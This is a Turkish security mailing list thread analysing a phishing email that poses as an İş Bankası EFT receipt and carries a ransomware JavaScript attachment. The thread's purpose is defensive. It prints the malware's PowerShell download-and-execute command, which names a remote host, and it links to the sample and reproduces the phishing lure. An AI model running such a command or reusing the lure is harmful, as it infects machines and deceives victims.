Re: [NetsecTR] Talimatsiz E.F.T. Islemi Dekontu

[Yusuf Öztürk]

Meraklısı için scriptin çalıştırdığı PowerShell komutu bu:

$path=($env:temp+'\zpujale.exe');
(New-Object System.Net.Webclient).DownloadFile('
http://topshop-london.com/wp.uyt',$path);

Tam halini yazmıyorum, yanlışlıkla çalıştıran olmasın diye. Fakat indirdiği
bu dosyayı çalıştırıyor. zpujale.exe ismiyle kaydediyor.

Yusuf

2017-01-25 8:48 GMT+01:00 Sertac Gursel <sertac.gur...@antlogs.com>:

> Teşekkürler Yalçın Bekmezci
>
>
>
> Firewall üzerinde file filter da java script ekli olmasına ragmen sızmış
> kuralları tekrar yapılandırıcam
>
>
>
> Teşekkürler
>
>
>
> Iyi çalışmalar
>
>
>
>
>
>
>
> *From:* Liste [mailto:liste-boun...@netsectr.org] *On Behalf Of *Yalcin
> BEKMEZCI
> *Sent:* Wednesday, January 25, 2017 09:13 AM
> *To:* 'liste@netsectr.org' <liste@netsectr.org>
> *Subject:* Re: [NetsecTR] Talimatsiz E.F.T. Islemi Dekontu
>
>
>
> Merhabalar ;
>
>
>
> Mail eklentili geliyor ve eklentide .js uzantılı Dekont.js eklenti
> bulunuyor bu eklenti açılınca pc deki dosyalar şifreleniyor.
>
>
>
> Symantec gateway bende silmiş .js uzantısı olduğu için
>
>
>
>  Güvenli Günler / Securely Yours
>
>
>
>
>
>
>
> *Yalçın BEKMEZCI*
>
>
>
> Bilgi Teknolojileri Uzmanı
>
> (Sistem, Ağ ve Altyapı,Siber Güvenlik)
>
>
>
> *Information Technology Specialist*
>
> [image: http://www.abdiibrahim.com.tr/images/ai_logo.jpg]
>
>
>
>
>
> T. 0212 622 67 19
>
>
>
> M. 0535 303 3322
>
>
>
>
>
>
>
>
>
>
>
> [image: http://www.abdiibrahim.com.tr/images/abdiibrahim.gif]
> <http://www.abdiibrahim.com.tr/>  [image:
> http://www.abdiibrahim.com.tr/images/mail-fb.gif]
> <https://www.facebook.com/abdiibrahimilac>  [image:
> http://www.abdiibrahim.com.tr/images/mail-t.gif]
> <https://twitter.com/abdiibrahimilac>  [image:
> http://www.abdiibrahim.com.tr/images/mail-in.gif]
> <http://www.linkedin.com/company/abdi-ibrahim-pharmaceuticals>  [image:
> http://www.abdiibrahim.com.tr/images/mail-y.gif]
> <http://www.youtube.com/abdiibrahimilac>
>
>
>
>
>
> *From:* Liste [mailto:liste-boun...@netsectr.org
> <liste-boun...@netsectr.org>] *On Behalf Of *Sertac Gursel
> *Sent:* Tuesday, January 24, 2017 5:11 PM
> *To:* liste@netsectr.org
> *Subject:* [NetsecTR] FW: Talimatsiz E.F.T. Islemi Dekontu
>
>
>
> Merhaba Arkadaşlar,
>
>
>
> Finans depertmanına gelen EFT işlemi gibi görünen ve yanılgı payı yüksek
> olan bir mail i sizler ile paylaşmak istedim, dosyayı daha önce inceleyen
> oldu ise verdiği zararları öğrenebilir miyim
>
>
>
> Download linki: https://we.tl/BZ4yZOnu0l
>
>
>
> Teşekkürler
>
>
>
> Iyi çalışmalar
>
>
>
> *From:* isbank.com.tr [mailto:b...@isb.com <b...@isb.com>]
> *Sent:* Tuesday, January 24, 2017 3:26 PM
> *To:* Filiz Karakas
> *Subject:* Talimatsiz E.F.T. Islemi Dekontu
>
>
>
>
>
> *TÜRKİYE İŞ BANKASI A.Ş.*
> Büyük Mükellefler V.D.Başkanlığı Vergi Kimlik No 481 005 8590 Ticaret
> Sicil No:431112 Şirket Merkezi: İstanbul
>
> *DEKONT*
>
> *Talimatsız E.F.T. İşlemi *
> İnternet Şubesi İşlem Dekontu
>
> *İşlem Tarihi*
>
> *İşlem Zamanı*
>
> *Sıra No*
>
> *Fiş Sıra No*
>
> 24/01/2017
>
> 16:18:27
>
> 000420
>
> 3616 1827
>
>
>
> *Dekont'u görmek için lütfen ekteki dosyayı indirin*
>
>
>
>
>
> *Aktarılan Tutar(TL)*
>
> *EFT Ücreti(TL) + Vergi*
>
> *Sorgu No.*
>
> 4,500.00
>
> 6.00
>
> 00167988
>
>
>
> *Açıklama*
>
> OCAK VADELI - HESABA AKTARILAN
>
> İşbu dekont Bankamız kayıtları çerçevesinde Bankamızca iletildiği hali ile
> geçerli olup, dekont üzerindeki bilgiler ile Bankamız kayıtlarının
> uyuşmaması veya Bankamızca gönderilen hali ile farklılık arz etmesi
> halinde, Bankamız kayıtları esas alınacaktır. Dekonta konu işleme dair
> iddiaların ispatında banka kayıtları asıldır.
> Vergi Türkiye'de BSMV, K.K.T.C'de BSİV olarak tahsil edilmektedir.
>
> www.isbank.com.tr - 0 850 724 0 724
>
>
> ------------------------------
> Bu e-posta sadece yukarıda isimleri belirtilen kişiler arasında özel
> haberleşme amacını taşımaktadır. Size yanlışlıkla ulaşmışsa lütfen mesajı
> sisteminizden siliniz. Anatolia Lojistik ve Dış Tic. Ltd. Şti. bu mesajın
> içeriği ile ilgili olarak hiçbir hukuksal sorumluluğu kabul etmez. This
> e-mail communication is intended for the private use of the people named
> above. If you received this message in error, please immediately delete it
> from your system. Anatolia Lojistik ve Dış Tic. Ltd. Şti. does not accept
> legal responsibility for the contents of this message
> ------------------------------
> Bu e-posta sadece yukarıda isimleri belirtilen kişiler arasında özel
> haberleşme amacını taşımaktadır. Size yanlışlıkla ulaşmışsa lütfen mesajı
> sisteminizden siliniz. Anatolia Lojistik ve Dış Tic. Ltd. Şti. bu mesajın
> içeriği ile ilgili olarak hiçbir hukuksal sorumluluğu kabul etmez. This
> e-mail communication is intended for the private use of the people named
> above. If you received this message in error, please immediately delete it
> from your system. Anatolia Lojistik ve Dış Tic. Ltd. Şti. does not accept
> legal responsibility for the contents of this message
>
>
>
>
>
> Bu e-posta mesaji ve ekleri sadece gonderildigi kisi veya kuruma ozeldir.
> Dogru aliciya ulasmamis olmasi halinde, bu mesajin baska bir aliciya
> yonlendirilmesi, kopyalanmasi veya kullanilmasi yasaktir.
> ------------------------------
>
> This e-mail and any attachments transmitted with it are confidential and
> intended solely for the use of the individual or entity to whom they are
> addressed.
> If you are not the intended recipient you are hereby notified that any
> forwarding, copying or use of the information is prohibited.
>
>
> ------------------------------
> Bu e-posta sadece yukarıda isimleri belirtilen kişiler arasında özel
> haberleşme amacını taşımaktadır. Size yanlışlıkla ulaşmışsa lütfen mesajı
> sisteminizden siliniz. Anatolia Lojistik ve Dış Tic. Ltd. Şti. bu mesajın
> içeriği ile ilgili olarak hiçbir hukuksal sorumluluğu kabul etmez. This
> e-mail communication is intended for the private use of the people named
> above. If you received this message in error, please immediately delete it
> from your system. Anatolia Lojistik ve Dış Tic. Ltd. Şti. does not accept
> legal responsibility for the contents of this message
>
> -------------------------------------------------
>
> İleri Seviye Ağ Güvenliği Eğitimi - 25-27 Ocak 2017
>
> https://www.bgasecurity.com/egitim-takvimi/
>
> -------------------------------------------------
>

-------------------------------------------------

İleri Seviye Ağ Güvenliği Eğitimi - 25-27 Ocak 2017

https://www.bgasecurity.com/egitim-takvimi/

-------------------------------------------------